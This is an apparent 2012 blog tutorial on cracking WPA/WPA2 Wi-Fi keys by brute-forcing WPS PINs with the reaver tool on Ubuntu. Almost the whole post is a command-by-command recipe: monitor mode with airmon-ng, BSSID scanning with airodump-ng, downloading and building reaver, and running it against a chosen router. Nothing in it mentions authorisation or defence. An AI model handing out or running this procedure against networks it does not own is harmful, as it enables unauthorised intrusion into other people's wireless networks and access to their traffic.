22/02/2012

How to crack WPA/WPA2 without a dictionary in 4-10 hours with reaver


The reign of secure WPA/WPA2 network encryption is now over...Well sort of as it does depend on the setup of the router. It no longer takes decades to crack thanks to Tactical Network Solutions. Their brilliant team have found a weakness in WPA that lets an attacker bruteforce against Wifi Protected Setup (WPS) PINS in order to then recover the WPA/WPA2 key. We'll be using a tool which exploits this bug called reaver.

I will take you through how this is done on a Linux machine, specifically Ubuntu!
Using the terminal:

1. Download aircrack-ng:
sudo apt-get install aircrack-ng
2. Put Wifi adapter into monitor mode:
sudo airmon-ng start wlan0
3. Use airodump-ng to scan for WPA/WPA2 encrypted network BSSIDs:
sudo airodump-ng mon0
 4. <crtl+c> after a few seconds or once a list of BSSIDs has populated, it should look like this:


The BSSIDs are listed on the left, these are the IDs for the various surrounding networks. Pick one which is WPA/WPA2 and uses a Public Shared Key (PSK).

Don't close this terminal, open up a new terminal and use this now instead. 

READ STEPS 5-8 OR JUST COPY AND PASTE THIS INTO YOUR TERMINAL AND THEN SKIP TO STEP 9:
sudo apt-get install libsqlite3-dev && wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz && tar xfvz reaver-1.4.tar.gz && cd reaver-1.4/src/ && ./configure && make && sudo make install
5. Download and install libsqlite3-dev:
sudo apt-get install libsqlite3-dev
 6. Download reaver:
wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
7. Extract reaver tar.gz file:
tar xfvz reaver-1.4.tar.gz
8. Install reaver:
cd reaver-1.4/src/ && ./configure && make && sudo make install
9. Get cracking! Copy the BSSID you chose from the other open terminal and enter it in like this:
sudo reaver -i mon0 -b <paste BSSID here!!> -vv
-i mon0 = use the mon0 interface which is your wifi adapter in monitor mode.
-b "some BSSID" = the router to crack.
-vv = give very verbose output.

10. Now wait from around 4-10 hours as it cracks the network key!

So I hope people have found this useful. It was just meant as a walk through as opposed to a detailed look at how it all works.